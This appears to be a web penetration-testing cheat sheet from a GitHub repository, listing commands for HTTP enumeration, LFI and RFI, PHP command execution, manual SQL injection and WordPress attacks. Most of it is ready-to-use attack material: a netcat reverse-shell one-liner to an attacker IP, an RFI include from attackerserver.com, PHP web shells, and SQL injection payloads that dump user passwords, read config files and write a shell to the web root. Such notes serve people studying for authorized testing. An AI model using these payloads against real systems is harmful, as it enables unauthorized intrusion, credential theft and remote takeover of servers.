-
Notifications
You must be signed in to change notification settings - Fork 179
/
Web
92 lines (70 loc) · 3.07 KB
/
Web
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
HTTP Enumeration
----------------------------------------------
# Gobuster
gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web_Content/common.txt -s '200,204,301,302,307,403,500' -e
----------------------------------------------
# nikto
nıkto -h <targetip>
----------------------------------------------
# curl
curl -v -X OPTIONS http://<targetip>/test/
curl --upload-file <file name> -v --url <url> -0 --http1.0
----------------------------------------------
# LFI
# PHP Wrapper
php://filter/convert.base64-encode/resource=index.php
# Null Byte
?page=../../../../../../etc/passwd%00
----------------------------------------------
# RFI
?page=http://attackerserver.com/evil.txt
----------------------------------------------
# Command Execution
<?php system('ls -la');?>
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <attackerip> 1234 >/tmp/f');?>
---------------------------------------------
# LFI and RCE
# Inject code execution
<?php echo system($_REQUEST["cmd"]);?>
# Go to LFI vuln and
?=…….&cmd=ls
----------------------------------------------
# SQL Injection (manual)
photoalbum.php?id=1'
# find the number of columns
photoalbum.php?id=1 order by 8
# Find space to output db
?id=1 union select 1,2,3,4,5,6,7,8
# Get username of the sql-user
?id=1 union select 1,2,3,4,user(),6,7,8
# Get version
?id=1 union select 1,2,3,4,version(),6,7,8
# Get all tables
?id=1 union select 1,2,3,4,table_name,6,7,8,9 from information_schema.tables
# Get all columns from a specific table
?id=1 union select 1,2,3, column_name ,5,6,7,8 from information_schema.columns where table_name=‘users’
?id=1 union select 1,2,3, group_concat(column_name) ,5,6,7,8 from information_schema.columns() where table_name=‘users’
.. 1,2,3, group_concat(user_id, 0x3a, first_name, 0x3a, last_name, 0x3a, email, 0x3a, pass, 0x3a, user_level) ,5,6,7,8 from users
# view files
' union select 1,2,3, load_file(‘/etc/passwd’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/login.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/includes/config.inc.php’) ,5,6,7,8 -- -
' union select 1,2,3, load_file(‘/var/www/mysqli_connect.php’) ,5,6,7,8 -- -
# upload files
' union select 1,2,3, 'this is a test message' ,5,6,7,8 into outfile '/var/www/test'-- -
' union select 1,2,3, load_file('/var/www/test') ,5,6,7,8 -- -
' union select null,null,null, "<?php system($_GET['cmd']) ?>" ,5,6,7,8 into outfile '/var/www/shell.php' -- -
' union select null,null,null, load_file('/var/www/shell.php') ,5,6,7,8 -- -
----------------------------------------------
# wordpress
wpscan --url http://.... --log
wpscan --url http://... --enumerate u --log
wpscan --url http://<targetip> --wordlist wordlist.txt --username example_username
http://....../wp-admin
http://...../wp-content/uploads/2017/10/file.png
----------------------------------------------
#Windows Command Execution (RFI exploit)
#Connect via netcat to victim (nc -nv <[IP]> <[PORT]>) and send
<?php echo shell_exec("nc.exe -nlvp 4444 -C:\Windows\System32\cmd.exe");?>
# on kali call the shell
nc -nv 10.11.25.59 4444